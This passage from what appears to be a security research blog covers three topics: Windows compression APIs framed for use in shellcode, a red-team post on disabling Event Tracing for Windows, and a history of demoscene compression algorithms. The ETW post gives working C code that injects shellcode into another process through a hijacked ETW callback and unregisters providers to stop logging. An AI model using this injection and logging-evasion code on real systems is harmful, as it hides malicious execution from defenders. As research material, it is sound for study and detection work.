              if(r) {
                WriteFile(outfile, outbuf, outlen, &wr, NULL);
              } else xstrerror("Compress()");
              free(outbuf);
            } else xstrerror("malloc()");
          } else xstrerror("Compress()");
          CloseCompressor(ch);
        } else xstrerror("CreateCompressor()");
        return r;
    }
    

    Decompression

    DWORD DecompressBuffer(DWORD engine, LPVOID inbuf, DWORD inlen, HANDLE outfile) {
        DECOMPRESSOR_HANDLE dh = NULL;
        BOOL                r;
        SIZE_T              outlen, len;
        LPVOID              outbuf;
        DWORD               wr;
        
        // Create a decompressor
        r = CreateDecompressor(engine, NULL, &dh);
        
        if(r) {    
          // Query Decompressed buffer size.
          Decompress(dh, inbuf, inlen, NULL, 0, &len);      
          if(GetLastError() == ERROR_INSUFFICIENT_BUFFER) {
            // allocate memory for decompressed data
            outbuf = malloc(len);
            if(outbuf != NULL) {
              // Decompress data and write data to outbuf.
              r = Decompress(dh, inbuf, inlen, outbuf, len, &outlen);
              // if decompressed ok, write to file
              if(r) {
                WriteFile(outfile, outbuf, outlen, &wr, NULL);
              } else xstrerror("Decompress()");
              free(outbuf);
            } else xstrerror("malloc()");
          } else xstrerror("Decompress()");
          CloseDecompressor(dh);
        } else xstrerror("CreateDecompressor()");
        return r;
    }
    

    4. Windows Packaging API

    If you’re a developer that wants to sell a Windows application to customers on the Microsoft Store, you must submit a package that uses the Open Packaging Conventions (OPC) format. Visual Studio automates building packages (.msix or .appx) and bundles (.msixbundle or .appxbundle). There’s also a well documented interface (IAppxFactory) that allows building them manually. While not intended to be used specifically for compression, there’s no reason why you can’t. An SDK sample to extract the contents of packages uses SHCreateStreamOnFileEx to read the package from disk. However, you can also use SHCreateMemStream and decompress a package entirely in memory.

    5. Windows Imaging API (WIM)

    These encode and decode .wim files on disk. WIMCreateFile internally calls CreateFile to return a file handle to an archive that’s then used with WIMCaptureImage to compress and add files to the archive. From what I can tell, there’s no way to work with .wim files in memory using these API.

    For Linux, the Windows Imaging (WIM) library supports Xpress, LZX and LZMS algorithms. libmspack and this repo provide good information on the various compression algorithms supported by Windows.

    6. Direct3D HLSL Compiler

    Believe it or not, the best compression ratio on Windows is provided by the Direct3D API. Internally, they use the DXT/Block Compression (BC) algorithms, which are designed specifically for textures/images. The algorithms provide higher quality compression rates than anything else available on Windows. The compression ratio was 60% for a 1MB EXE file and using the API is very easy. The following example in C uses D3DCompressShaders and D3DDecompressShaders. While untested, I believe OpenGL API could likely be used in a similar way.

    Compression

    #pragma comment(lib, "D3DCompiler.lib")
    #include <d3dcompiler.h>
    uint32_t d3d_compress(const void *inbuf, uint32_t inlen) {
        
        D3D_SHADER_DATA dsa;
        HRESULT         hr;
        ID3DBlob        *blob;
        SIZE_T          outlen = 0;
        LPVOID          outbuf;
        HANDLE          file;
        DWORD           len;
        
        file = CreateFile("compressed.bin", GENERIC_WRITE, 0, 0, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
        if(file == INVALID_HANDLE_VALUE) return 0;
        
        dsa.pBytecode      = inbuf;
        dsa.BytecodeLength = inlen;
        
        // compress data
        hr = D3DCompressShaders(1, &dsa, D3D_COMPRESS_SHADER_KEEP_ALL_PARTS, &blob);
        if(hr == S_OK) {
          // write to file
          outlen = blob->lpVtbl->GetBufferSize(blob);
          outbuf = blob->lpVtbl->GetBufferPointer(blob);
          
          WriteFile(file, outbuf, outlen, &len, 0);
          blob->lpVtbl->Release(blob);
        }
        CloseHandle(file);
        return outlen;
    }
    

    Decompression

    uint32_t d3d_decompress(const void *inbuf, uint32_t inlen) {
        D3D_SHADER_DATA dsa;
        HRESULT         hr;
        ID3DBlob        *blob;
        SIZE_T          outlen = 0;
        LPVOID          outbuf;
        HANDLE          file;
        DWORD           len;
        
        // create file to save decompressed data to
        file = CreateFile("decompressed.bin", GENERIC_WRITE, 0, 0, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
        if(file == INVALID_HANDLE_VALUE) return 0;
        
        dsa.pBytecode      = inbuf;
        dsa.BytecodeLength = inlen;
        
        // decompress buffer
        hr = D3DDecompressShaders(inbuf, inlen, 1, 0, 0, 0, &blob, NULL);
        if(hr == S_OK) {
          // write to file
          outlen = blob->lpVtbl->GetBufferSize(blob);
          outbuf = blob->lpVtbl->GetBufferPointer(blob);
          
          WriteFile(file, outbuf, outlen, &len, 0);
          blob->lpVtbl->Release(blob);
        }
        CloseHandle(file);
        return outlen;    
    }
    

    The main problem with dynamically resolving these API is knowing what version is installed. The file name on my Windows 10 system is “D3DCompiler_47.dll”. It will likely be different on legacy systems.

    7. Windows-internal libarchive library

    Since the release of Windows 10 build 17063, the tape archiving tool ‘bsdtar’ is available and uses a stripped down version of the open source Multi-format archive and compression library to create and extract compressed files both in memory and on disk. The version found on windows supports bzip2, compress and gzip formats. Although, bsdtar shows support for xz and lzma, at least on my system along with lzip, they appear to be unsupported.

    8. LibreSSL Cryptography Library

    Windows 10 Fall Creators Update and Windows Server 1709 include support for an OpenSSH client and server. The crypto library used by this port appears to have been compiled from the LibreSSL project, and if available can be found in C:\Windows\System32\libcrypto.dll. As some of you know, Transport Layer Security (TLS) supports compression prior to encryption. LibreSSL supports the ZLib and RLE methods, so it’s entirely possible to use COMP_compress_block and COMP_expand_block to compress and decompress raw data in memory.

    9. Windows.Storage.Compression

    This namespace located in Windows.Storage.Compress.dll internally uses Windows Compression API. CreateCompressor is invoked with the COMPRESS_RAW flag set. It also invokes SetCompressorInformation with COMPRESS_INFORMATION_CLASS_BLOCK_SIZE flag if the user specifies one in the Compressor method.

    10. Windows Undocumented API

    DLLs on Windows use the DEFLATE algorithm extensively to support various audio, video, image encoders/decoders and file archives. Normally, the deflate routines are used internally and can’t be resolved dynamically via GetProcAddress. However, between at least Windows 7 and 10 is a DLL called PresentationNative_v0300.dll that can be found in the C:\Windows\System32 directory. (There may also be PresentationNative_v0400.dll, but I haven’t investigated this thoroughly enough.) Four public symbols grabbed my attention, which are ums_deflate_init, ums_deflate, ums_inflate_init and ums_inflate. For a PoC demonstrating how to use them, see winflate.c

    Compression

    The following code uses zlib.h to compress a buffer and write to file.

    DWORD CompressBuffer(LPVOID inbuf, DWORD inlen, HANDLE outfile) {
        SIZE_T             outlen, len;
        LPVOID             outbuf;
        DWORD              wr;
        HMODULE            m;
        z_stream           ds;
        ums_deflate_t      ums_deflate;
        ums_deflate_init_t ums_deflate_init;
        int                err;
        
        m = LoadLibrary("PresentationNative_v0300.dll");
        ums_deflate_init = (ums_deflate_init_t)GetProcAddress(m, "ums_deflate_init");
        ums_deflate      = (ums_deflate_t)GetProcAddress(m, "ums_deflate");
        
        if(ums_deflate_init == NULL || ums_deflate == NULL) {
          printf("  [ unable to resolve deflate API.\n");
          return 0;
        }
        // allocate memory for compressed data
        outbuf = malloc(inlen);
        if(outbuf != NULL) {
          // Compress data and write data to outbuf.
          ds.zalloc    = Z_NULL;
          ds.zfree     = Z_NULL;
          ds.opaque    = Z_NULL;
          ds.avail_in  = (uInt)inlen;       // size of input
          ds.next_in   = (Bytef *)inbuf;    // input buffer
          ds.avail_out = (uInt)inlen;       // size of output buffer
          ds.next_out  = (Bytef *)outbuf;   // output buffer
          
          if(ums_deflate_init(&ds, Z_BEST_COMPRESSION, "1", sizeof(ds)) == Z_OK) {
            if((err = ums_deflate(&ds, Z_FINISH)) == Z_STREAM_END) {
              // write the original length first
              WriteFile(outfile, &inlen, sizeof(DWORD), &wr, NULL);
              // then the data
              WriteFile(outfile, outbuf, ds.avail_out, &wr, NULL);
              FlushFileBuffers(outfile);
            } else {
              printf("  [ ums_deflate() : %x\n", err);
            }
          } else {
            printf("  [ ums_deflate_init()\n");
          }
          free(outbuf);
        }
        return 0;
    }
    

    Decompression

    Inflating/decompressing the data is based on an example using zlib.

    DWORD DecompressBuffer(LPVOID inbuf, DWORD inlen, HANDLE outfile) {
        SIZE_T             outlen, len;
        LPVOID             outbuf;
        DWORD              wr;
        HMODULE            m;
        z_stream           ds;
        ums_inflate_t      ums_inflate;
        ums_inflate_init_t ums_inflate_init;
        
        m = LoadLibrary("PresentationNative_v0300.dll");
        ums_inflate_init = (ums_inflate_init_t)GetProcAddress(m, "ums_inflate_init");
        ums_inflate      = (ums_inflate_t)GetProcAddress(m, "ums_inflate");
        
        if(ums_inflate_init == NULL || ums_inflate == NULL) {
          printf("  [ unable to resolve inflate API.\n");
          return 0;
        }
        // allocate memory for decompressed data
        outlen = *(DWORD*)inbuf;
        outbuf = malloc(outlen*2);
        
        if(outbuf != NULL) {
          // decompress data and write data to outbuf.
          ds.zalloc    = Z_NULL;
          ds.zfree     = Z_NULL;
          ds.opaque    = Z_NULL;
          ds.avail_in  = (uInt)inlen - 8;       // size of input
          ds.next_in   = (Bytef*)inbuf + 4;     // input buffer
          ds.avail_out = (uInt)outlen*2;        // size of output buffer
          ds.next_out  = (Bytef*)outbuf;        // output buffer
          
          printf("  [ initializing inflate...\n");
          if(ums_inflate_init(&ds, "1", sizeof(ds)) == Z_OK) {
            printf("  [ inflating...\n");
            if(ums_inflate(&ds, Z_FINISH) == Z_STREAM_END) {
              WriteFile(outfile, outbuf, ds.avail_out, &wr, NULL);
              FlushFileBuffers(outfile);
            } else {
              printf("  [ ums_inflate()\n");
            }
          } else {
            printf("  [ ums_inflate_init()\n");
          }
          free(outbuf);
        } else {
          printf("  [ malloc()\n");
        }
        return 0;
    }
    

    11. Summary/Results

    That sums up the algorithms I think are suitable for a shellcode. For the moment, UCL and apultra seem to provide the best solution. Using Windows API is a good option. They are also susceptible to monitoring and may not be portable. One area I didn’t cover due to time is Media Foundation API. It may be possible to use audio, video and image encoders to compress raw data and the decoders to decompress. Worth researching?

    Library / API Algorithm / Engine Compression Ratio
    RtlCompressBuffer LZNT1 39%
    RtlCompressBuffer Xpress 47%
    RtlCompressBuffer Xpress Huffman 53%
    Compress MSZIP 55%
    Compress Xpress 40%
    Compress Xpress Huffman 48%
    Compress LZMS 58%
    D3DCompressShaders DXT/BC 60%
    aPLib N/A 45%
    UCL N/A 42%
    Undocumented API DEFLATE 46%

    Another method of bypassing ETW and Process Injection via ETW registration entries.

    By: odzhan
    8 April 2020 at 18:00

    Contents

    1. Introduction
    2. Registering Providers
    3. Locating the Registration Table
    4. Parsing the Registration Table
    5. Code Redirection
    6. Disable Tracing
    7. Further Research

    1. Introduction

    This post briefly describes some techniques used by Red Teams to disrupt detection of malicious activity by the Event Tracing facility for Windows. It’s relatively easy to find information about registered ETW providers in memory and use it to disable tracing or perform code redirection. Since 2012, wincheck provides an option to list ETW registrations, so what’s discussed here isn’t all that new. Rather than explain how ETW works and the purpose of it, please refer to a list of links here. For this post, I took inspiration from Hiding your .NET – ETW by Adam Chester that includes a PoC for EtwEventWrite. There’s also a PoC called TamperETW, by Cornelis de Plaa. A PoC to accompany this post can be found here.

    2. Registering Providers

    At a high-level, providers register using the advapi32!EventRegister API, which is usually forwarded to ntdll!EtwEventRegister. This API validates arguments and forwards them to ntdll!EtwNotificationRegister. The caller provides a unique GUID that normally represents a well-known provider on the system, an optional callback function and an optional callback context.

    Registration handles are the memory address of an entry combined with table index shifted left by 48-bits. This may be used later with EventUnregister to disable tracing. The main functions of interest to us are those responsible for creating registration entries and storing them in memory. ntdll!EtwpAllocateRegistration tells us the size of the structure is 256 bytes. Functions that read and write entries tell us what most of the fields are used for.

    typedef struct _ETW_USER_REG_ENTRY {
        RTL_BALANCED_NODE   RegList;           // List of registration entries
        ULONG64             Padding1;
        GUID                ProviderId;        // GUID to identify Provider
        PETWENABLECALLBACK  Callback;          // Callback function executed in response to NtControlTrace
        PVOID               CallbackContext;   // Optional context
        SRWLOCK             RegLock;           // 
        SRWLOCK             NodeLock;          // 
        HANDLE              Thread;            // Handle of thread for callback
        HANDLE              ReplyHandle;       // Used to communicate with the kernel via NtTraceEvent
        USHORT              RegIndex;          // Index in EtwpRegistrationTable
        USHORT              RegType;           // 14th bit indicates a private
        ULONG64             Unknown[19];
    } ETW_USER_REG_ENTRY, *PETW_USER_REG_ENTRY;
    

    ntdll!EtwpInsertRegistration tells us where all the entries are stored. For Windows 10, they can be found in a global variable called ntdll!EtwpRegistrationTable.

    3. Locating the Registration Table

    A number of functions reference it, but none are public.

    • EtwpRemoveRegistrationFromTable
    • EtwpGetNextRegistration
    • EtwpFindRegistration
    • EtwpInsertRegistration

    Since we know the type of structures to look for in memory, a good old brute force search of the .data section in ntdll.dll is enough to find it.

    LPVOID etw_get_table_va(VOID) {
        LPVOID                m, va = NULL;
        PIMAGE_DOS_HEADER     dos;
        PIMAGE_NT_HEADERS     nt;
        PIMAGE_SECTION_HEADER sh;
        DWORD                 i, cnt;
        PULONG_PTR            ds;
        PRTL_RB_TREE          rbt;
        PETW_USER_REG_ENTRY   re;
        
        m   = GetModuleHandle(L"ntdll.dll");
        dos = (PIMAGE_DOS_HEADER)m;  
        nt  = RVA2VA(PIMAGE_NT_HEADERS, m, dos->e_lfanew);  
        sh  = (PIMAGE_SECTION_HEADER)((LPBYTE)&nt->OptionalHeader + 
                nt->FileHeader.SizeOfOptionalHeader);
        
        // locate the .data segment, save VA and number of pointers
        for(i=0; i<nt->FileHeader.NumberOfSections; i++) {
          if(*(PDWORD)sh[i].Name == *(PDWORD)".data") {
            ds  = RVA2VA(PULONG_PTR, m, sh[i].VirtualAddress);
            cnt = sh[i].Misc.VirtualSize / sizeof(ULONG_PTR);
            break;
          }
        }
        
        // For each pointer minus one
        for(i=0; i<cnt - 1; i++) {
          rbt = (PRTL_RB_TREE)&ds[i];
          // Skip pointers that aren't heap memory
          if(!IsHeapPtr(rbt->Root)) continue;
          
          // It might be the registration table.
          // Check if the callback is code
          re = (PETW_USER_REG_ENTRY)rbt->Root;
          if(!IsCodePtr(re->Callback)) continue;
          
          // Save the virtual address and exit loop
          va = &ds[i];
          break;
        }
        return va;
    }
    

    4. Parsing the Registration Table

    ETW Dump can display information about each ETW provider in the registration table of one or more processes. The name of a provider (with exception to private providers) is obtained using ITraceDataProvider::get_DisplayName. This method uses the Trace Data Helper API which internally queries WMI.

    Node        : 00000267F0961D00
    GUID        : {E13C0D23-CCBC-4E12-931B-D9CC2EEE27E4} (.NET Common Language Runtime)
    Description : Microsoft .NET Runtime Common Language Runtime - WorkStation
    Callback    : 00007FFC7AB4B5D0 : clr!McGenControlCallbackV2
    Context     : 00007FFC7B0B3130 : clr!MICROSOFT_WINDOWS_DOTNETRUNTIME_PROVIDER_Context
    Index       : 108
    Reg Handle  : 006C0267F0961D00
    

    5. Code Redirection

    The Callback function for a provider is invoked in request by the kernel to enable or disable tracing. For the CLR, the relevant function is clr!McGenControlCallbackV2. Code redirection is achieved by simply replacing the callback address with the address of a new callback. Of course, it must use the same prototype, otherwise the host process will crash once the callback finishes executing. We can invoke a new callback using the StartTrace and EnableTraceEx API, although there may be a simpler way via NtTraceControl.

    // inject shellcode into process using ETW registration entry
    BOOL etw_inject(DWORD pid, PWCHAR path, PWCHAR prov) {
        RTL_RB_TREE             tree;
        PVOID                   etw, pdata, cs, callback;
        HANDLE                  hp;
        SIZE_T                  rd, wr;
        ETW_USER_REG_ENTRY      re;
        PRTL_BALANCED_NODE      node;
        OLECHAR                 id[40];
        TRACEHANDLE             ht;
        DWORD                   plen, bufferSize;
        PWCHAR                  name;
        PEVENT_TRACE_PROPERTIES prop;
        BOOL                    status = FALSE;
        const wchar_t           etwname[]=L"etw_injection\0";
        
        if(path == NULL) return FALSE;
        
        // try read shellcode into memory
        plen = readpic(path, &pdata);
        if(plen == 0) { 
          wprintf(L"ERROR: Unable to read shellcode from %s\n", path); 
          return FALSE; 
        }
        
        // try obtain the VA of ETW registration table
        etw = etw_get_table_va();
        
        if(etw == NULL) {
          wprintf(L"ERROR: Unable to obtain address of ETW Registration Table.\n");
          return FALSE;
        }
        
        printf("*********************************************\n");
        printf("EtwpRegistrationTable for %i found at %p\n", pid, etw);  
        
        // try open target process
        hp = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid);
        
        if(hp == NULL) {
          xstrerror(L"OpenProcess(%ld)", pid);
          return FALSE;
        }
        
        // use (Microsoft-Windows-User-Diagnostic) unless specified
        
        node = etw_get_reg(
          hp, 
          etw, 
          prov != NULL ? prov : L"{305FC87B-002A-5E26-D297-60223012CA9C}", 
          &re);
        
        if(node != NULL) {
          // convert GUID to string and display name
          StringFromGUID2(&re.ProviderId, id, sizeof(id));
          name = etw_id2name(id);
            
          wprintf(L"Address of remote node  : %p\n", (PVOID)node);
          wprintf(L"Using %s (%s)\n", id, name);
          
          // allocate memory for shellcode
          cs = VirtualAllocEx(
            hp, NULL, plen, 
            MEM_COMMIT | MEM_RESERVE, 
            PAGE_EXECUTE_READWRITE);
            
          if(cs != NULL) {
            wprintf(L"Address of old callback : %p\n", re.Callback);
            wprintf(L"Address of new callback : %p\n", cs);
            
            // write shellcode
            WriteProcessMemory(hp, cs, pdata, plen, &wr);
              
            // initialize trace
            bufferSize = sizeof(EVENT_TRACE_PROPERTIES) + 
                         sizeof(etwname) + 2;
    
            prop = (EVENT_TRACE_PROPERTIES*)LocalAlloc(LPTR, bufferSize);
            prop->Wnode.BufferSize    = bufferSize;
            prop->Wnode.ClientContext = 2;
            prop->Wnode.Flags         = WNODE_FLAG_TRACED_GUID;
            prop->LogFileMode         = EVENT_TRACE_REAL_TIME_MODE;
            prop->LogFileNameOffset   = 0;
            prop->LoggerNameOffset    = sizeof(EVENT_TRACE_PROPERTIES);
            
            if(StartTrace(&ht, etwname, prop) == ERROR_SUCCESS) {
              // save callback
              callback = re.Callback;
              re.Callback = cs;
              
              // overwrite existing entry with shellcode address
              WriteProcessMemory(hp, 
                (PBYTE)node + offsetof(ETW_USER_REG_ENTRY, Callback), 
                &cs, sizeof(ULONG_PTR), &wr);
              
              // trigger execution of shellcode by enabling trace
              if(EnableTraceEx(
                &re.ProviderId, NULL, ht,
                1, TRACE_LEVEL_VERBOSE, 
                (1 << 16), 0, 0, NULL) == ERROR_SUCCESS) 
              {
                status = TRUE;
              }
              
              // restore callback
              WriteProcessMemory(hp, 
                (PBYTE)node + offsetof(ETW_USER_REG_ENTRY, Callback), 
                &callback, sizeof(ULONG_PTR), &wr);
    
              // disable tracing
              ControlTrace(ht, etwname, prop, EVENT_TRACE_CONTROL_STOP);
            } else {
              xstrerror(L"StartTrace");
            }
            LocalFree(prop);
            VirtualFreeEx(hp, cs, 0, MEM_DECOMMIT | MEM_RELEASE);
          }        
        } else {
          wprintf(L"ERROR: Unable to get registration entry.\n");
        }
        CloseHandle(hp);
        return status;
    }
    

    6. Disable Tracing

    If you decide to examine clr!McGenControlCallbackV2 in more detail, you’ll see that it changes values in the callback context to enable or disable event tracing. For CLR, the following structure and function are used. Again, this may be defined differently for different versions of the CLR.

    typedef struct _MCGEN_TRACE_CONTEXT {
        TRACEHANDLE      RegistrationHandle;
        TRACEHANDLE      Logger;
        ULONGLONG        MatchAnyKeyword;
        ULONGLONG        MatchAllKeyword;
        ULONG            Flags;
        ULONG            IsEnabled;
        UCHAR            Level;
        UCHAR            Reserve;
        USHORT           EnableBitsCount;
        PULONG           EnableBitMask;
        const ULONGLONG* EnableKeyWords;
        const UCHAR*     EnableLevel;
    } MCGEN_TRACE_CONTEXT, *PMCGEN_TRACE_CONTEXT;
    
    void McGenControlCallbackV2(
      LPCGUID              SourceId, 
      ULONG                IsEnabled, 
      UCHAR                Level, 
      ULONGLONG            MatchAnyKeyword, 
      ULONGLONG            MatchAllKeyword, 
      PVOID                FilterData, 
      PMCGEN_TRACE_CONTEXT CallbackContext) 
    {
      int cnt;
      
      // if we have a context
      if(CallbackContext) {
        // and control code is not zero
        if(IsEnabled) {
          // enable tracing?
          if(IsEnabled == EVENT_CONTROL_CODE_ENABLE_PROVIDER) {
            // set the context
            CallbackContext->MatchAnyKeyword = MatchAnyKeyword;
            CallbackContext->MatchAllKeyword = MatchAllKeyword;
            CallbackContext->Level           = Level;
            CallbackContext->IsEnabled       = 1;
            
            // ...other code omitted...
          }
        } else {
          // disable tracing
          CallbackContext->IsEnabled       = 0;
          CallbackContext->Level           = 0;
          CallbackContext->MatchAnyKeyword = 0;
          CallbackContext->MatchAllKeyword = 0;
          
          if(CallbackContext->EnableBitsCount > 0) {
            
            ZeroMemory(CallbackContext->EnableBitMask,
              4 * ((CallbackContext->EnableBitsCount - 1) / 32 + 1));
          }
        }
        EtwCallback(
          SourceId, IsEnabled, Level, 
          MatchAnyKeyword, MatchAllKeyword, 
          FilterData, CallbackContext);
      }
    }
    

    There are a number of options to disable CLR logging that don’t require patching code.

    • Invoke McGenControlCallbackV2 using EVENT_CONTROL_CODE_DISABLE_PROVIDER.
    • Directly modify the MCGEN_TRACE_CONTEXT and ETW registration structures to prevent further logging.
    • Invoke EventUnregister passing in the registration handle.

    The simplest way is passing the registration handle to ntdll!EtwEventUnregister. The following is just a PoC.

    BOOL etw_disable(
        HANDLE             hp,
        PRTL_BALANCED_NODE node,
        USHORT             index) 
    {
        HMODULE               m;
        HANDLE                ht;
        RtlCreateUserThread_t pRtlCreateUserThread;
        CLIENT_ID             cid;
        NTSTATUS              nt=~0UL;
        REGHANDLE             RegHandle;
        EventUnregister_t     pEtwEventUnregister;
        ULONG                 Result;
        
        // resolve address of API for creating new thread
        m = GetModuleHandle(L"ntdll.dll");
        pRtlCreateUserThread = (RtlCreateUserThread_t)
            GetProcAddress(m, "RtlCreateUserThread");
        
        // create registration handle    
        RegHandle           = (REGHANDLE)((ULONG64)node | (ULONG64)index << 48);
        pEtwEventUnregister = (EventUnregister_t)GetProcAddress(m, "EtwEventUnregister");
    
        // execute payload in remote process
        printf("  [ Executing EventUnregister in remote process.\n");
        nt = pRtlCreateUserThread(hp, NULL, FALSE, 0, NULL, 
          NULL, pEtwEventUnregister, (PVOID)RegHandle, &ht, &cid);
    
        printf("  [ NTSTATUS is %lx\n", nt);
        WaitForSingleObject(ht, INFINITE);
        
        // read result of EtwEventUnregister
        GetExitCodeThread(ht, &Result);
        CloseHandle(ht);
        
        SetLastError(Result);
        
        if(Result != ERROR_SUCCESS) {
          xstrerror(L"etw_disable");
          return FALSE;
        }
        disabled_cnt++; 
        return TRUE;
    }
    

    7. Further Research

    I may have missed articles/tools on ETW. Feel free to email me with the details.

    Shellcode: Recycling Compression Algorithms for the Z80, 8088, 6502, 8086, and 68K Architectures.

    By: odzhan
    27 May 2020 at 01:00

    Recycling Compression Algorithms for the Z80, 8088, 6502, 8086, and 68K Architectures.

    Contents

    1. Introduction
    2. History
    3. Entropy Coding
    4. Universal code
    5. Lempel-Ziv (LZ77/LZ1)
    6. Lempel-Ziv-Storer-Szymanski (LZSS)
    7. Lempel-Ziv-Bell (LZB)
    8. Intel 8088 / 8086
      1. LZE
      2. LZ4
      3. LZSA
      4. aPLib
    9. MOS Technology 6502
      1. Exomizer
      2. Pucrunch
    10. Zilog 80
      1. Mega LZ
      2. ZX7
      3. ZX7 Mini
      4. LZF
    11. Motorola 68000
      1. PackFire
      2. Shrinkler
    12. C/x86 ASM
      1. Lempel-Ziv Ross Williams (LZRW)
      2. Ultra-fast LZ (ULZ)
      3. BriefLZ
      4. Not Really Vanished (NRV)
      5. Lempel–Ziv–Markov Algorithm (LZMA)
      6. Lempel–Ziv–Oberhumer-Markov Algorithm (LZOMA)
      7. KKrunchy
    13. Results
    14. Summary
    15. Acknowledgements
    16. Further Research
      1. Documentaries and Interviews
      2. Websites, Blogs and Forums
      3. Demoscene Productions
      4. Tools
      5. Other Compression Algorithms

    1. Introduction

    My last post about compression inadvertently missed algorithms used by the Demoscene that I attempt to correct here. Except for research by Introspec about various 8-Bit algorithms on the ZX Spectrum, it’s tricky to find information in one location about compression used in Demoscene productions. The focus here will be on variations of the Lempel-Ziv (LZ) scheme published in 1977 that are suitable for resource-constrained environments such as 8, 16, and 32-bit home computers released in the 1980s. In executable compression, we can consider LZ an umbrella term for LZ77, LZSS, LZB, LZH, LZARI, and any other algorithms inspired by those designs.

    Many variations of LZ surfaced in the past thirty years, and a detailed description of them all would be quite useful for historical reference. However, the priority for this post is exploring algorithms with the best ratios that also use the least amount of code possible for decompression. Considerations include an open-source compressor and the speed of compression and decompression. However, some decoders without sources for a compressor are also useful to show the conversion between architectures.

    Drop me an email, if you would like to provide feedback on this post. x86 assembly codes for some of algorithms discussed here may be found here.

    2. History

    Designing a compression format requires trade-offs, such as compression ratio, compression speed, decompression speed, code complexity, code size, memory usage, etc. For executable compression in particular, where the sum of decompression code size and compressed size is what counts, the optimal balance between these two depends on the intended target size.Aske Simon Christensen, author of Shrinkler and co-author of Crinkler.

    Since the invention of telegraphy, telephony, and especially television, engineers have sought ways to reduce the bandwidth required for transmitting electrical signals. Before the invention of analog-to-digital converters and entropy coding methods in the 1950s, compaction of television signals required reducing the quality of the video before transmission, a technique that’s referred to as lossy compression. Many publications on compressing television signals surfaced between the 1950s-1970s, and these eventually proved to be useful in other applications, most notably for the aerospace industry.

    For example, various interplanetary spacecraft launched in the 1960s could record data faster than what they could transmit to earth. And following a review of unclassified space missions in the early 1960s, in particular, the Mariner Mars mission of 1964, NASA’s Jet Propulsion Laboratory examined various compression methods for acquiring images in space. The first unclassified spacecraft to use image compression was Explorer 34 or Interplanetary Monitoring Platform 4 (IMP-4) launched in 1967. It used Chroma subsampling, invented in the 1950s specifically for color television. This method, which eventually became part of the JPEG standard, would continue being used by NASA until the invention of a more optimal encoding method called Discrete Cosine Transform (DCT)

    The increase of computer mainframes in the 1950s and the collection of data on citizens for social science motivated prior research and development of lossless compression techniques. Microprocessors became inexpensive in the late 1970s, leading the way for average consumers to purchase a computer of their own. However, this didn’t immediately reduce the cost of disk storage. And the vast majority of user data remained stored on magnetic tapes or floppy diskettes rather than hard disk drives offered only as an optional component.

    Hard disk drives remained expensive between 1980-2000, encouraging the development of tools to reduce the size of files. The first program to compress executables on the PC was Realia Spacemaker, which was written by Robert Dewar and published in 1982. The precise algorithm used by this program remains undocumented. However, the year of publication would suggest it uses Run-length encoding (RLE). Qkumba informed me about two things via email. First, games for the Apple II used RLE in the early 1980s for shrinking images used as title screens. Examples include Beach-Head, G.I. Joe and Black Magic, to name a few. Second, games by Infocom used Huffman-like text compression. Microsoft EXEPACK by Reuben Borman and published in 1985 also used RLE for compression.

    Haruhiko Okumura uploaded an implementation of the LZSS compression algorithm to a Bulletin Board System (BBS) in 1988. Inspired by Okumura, Fabrice Bellard published LZEXE in 1989, which appears to be the first executable compressor to use LZSS.

    3. Entropy Coding

    Samuel Morse published his coding system for the electrical telegraph in 1838. It assigned short symbols for the most common letters of an alphabet, and this may be the first example of compression used for electrical signals. An entropy coder works similarly. It removes redundancy by assigning short codewords for symbols occurring more frequently and longer codewords for symbols with less frequency. The following table lists some examples.

    Type Publication and Author
    Shannon A Mathematical Theory of Communication published in 1948 by Claude E. Shannon.
    Huffman A Method for the Construction of Minimum Redundancy Codes published in 1952 by David A. Huffman.
    Arithmetic Generalized Kraft Inequality and Arithmetic Coding published in 1976 by Jorma Rissanen.
    Range There are two papers of interest here. One is Source Coding Algorithms for Fast Data Compression published in 1976 by Richard Clark Pasco. The other is Range encoding: An Algorithm for Removing Redundancy from a Digitised Message published in 1979 by G.N.N. Martin.
    ANS Asymmetric Numeral Systems: Entropy Coding Combining Speed of Huffman Coding with Compression Rate of Arithmetic Coding published in 2014 by Jarosław Duda.

    Arithmetic or range coders fused with an LZ77-style compressor result in high compression ratios and compact decompressors, which makes them attractive to the demoscene. They are slower than a Huffman coder, but much more efficient. ANS is the favored coder used in mission-critical systems today, providing efficiency and speed.

    4. Universal Code

    There are many variable-length coding methods used for integers of arbitrary upper bound, and most of the algorithms presented in this post use Elias gamma coding for the offset and length of a match reference. The following table contains a list of papers referenced in Punctured Elias Codes for variable-length coding of the integers published by Peter Fenwick in 1996.

    Coding Author and publication
    Golomb Run-length encodings published in 1966 by Solomon W. Golomb.
    Levenshtein On the redundancy and delay of separable codes for the natural numbers. published in 1968 by Vladimir I. Levenshtein.
    Elias Universal Codeword Sets and Representations of the Integers published in 1975 by Peter Elias.
    Rodeh-Even Economical Encoding of Commas Between Strings published in 1978 by Michael Rodeh and Shimon Even.
    Rice Some Practical Universal Noiseless Coding Techniques published in 1979 by Robert F. Rice.

    5. Lempel-Ziv (LZ77/LZ1)

    Designed by Abraham Lempel and Jacob Ziv and described in A Universal Algorithm for Sequential Data Compression published in 1977. It compresses files by searching for the repetition of strings or sequences of bytes and storing a reference pointer and length to an earlier occurrence. The size of a reference pointer and length will define the overall speed of the compression and compression ratio. The following decoder uses a 12-Bit reference pointer (4096 bytes) and 4-Bit length (16 bytes). It will work with a a compressor written by Andy Herbert. However, you must change the compressor to use 16-bits for a match reference. Charles Bloom discusses small LZ decoders in a blog post that may be of interest to readers.

    uint32_t lz77_depack(
      void *outbuf, 
      uint32_t outlen, 
      const void *inbuf) 
    {
        uint32_t ofs, len;
        uint8_t  *in, *out, *end, *ptr;
        
        in  = (uint8_t*)inbuf;
        out = (uint8_t*)outbuf;
        end = out + outlen;
        
        while(out < end) {
          len = *(uint16_t*)in;
          in += 2;
          ofs = len >> 4; 
          
          // offset?
          if(ofs) {
            // copy reference
            len = (len & 15) + 1;
            ptr = out - ofs;
            while(len--) *out++ = *ptr++;
          }
          // copy literal
          *out++ = *in++;
        }
        // return depacked length
        return (out - (uint8_t*)outbuf);
    }
    

    The assembly is optimized for size, currently at 54 bytes.

    lz77_depack:
    _lz77_depack:
        pushad
        
        lea    esi, [esp+32+4]
        lodsd
        xchg   edi, eax           ; edi = outbuf
        lodsd
        lea    ebx, [eax+edi]     ; ebx = outlen + outbuf
        lodsd
        xchg   esi, eax           ; esi = inbuf
        xor    eax, eax
    lz77_main:
        cmp    edi, ebx           ; while (out < end)
        jnb    lz77_exit
        
